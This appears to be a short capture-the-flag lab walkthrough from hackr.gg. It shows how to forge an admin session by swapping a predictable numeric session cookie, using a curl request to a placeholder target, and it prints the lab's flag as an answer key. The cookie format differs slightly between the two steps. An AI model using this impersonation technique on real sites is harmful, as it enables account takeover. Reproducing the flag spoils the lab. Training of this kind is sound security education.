HACKR.GG
hackr.gg — MemberZone — Session Forge Walkthrough
Save as PDF ↓
hackr.gg
— Official Walkthrough
Confidential · Educational Use Only
MemberZone — Session Forge
Session Security · Weak Session Token
Difficulty
Beginner
Vuln class
Weak Session Token
Steps
2
// Objective
Forge an admin session by replacing your predictable session cookie with the admin's ID.
// Tools required
Browser
DevTools
curl
// Step-by-step walkthrough
1
Log in and inspect your session cookie
Log in as a regular user. Open DevTools → Application → Cookies. Note the session value — it's a simple numeric or sequential ID.
Command / Input
Cookie: session=1001
⚑ Predictable session IDs (sequential integers, usernames, etc.) allow easy impersonation.
2
Try admin session IDs
Admin accounts typically have low numeric IDs. Try session_1000 or just 1000.
Command / Input
curl http://TARGET/api/me -H "Cookie: session=session_1000"
Output
{"user":"admin","role":"admin","flag":"HackrGG{s3ss10n_f0rg3d_4dm1n_4cc3ss}"}
// Flag
Flag value
HackrGG{s3ss10n_f0rg3d_4dm1n_4cc3ss}
Returned by /api/me when the admin session ID is sent.
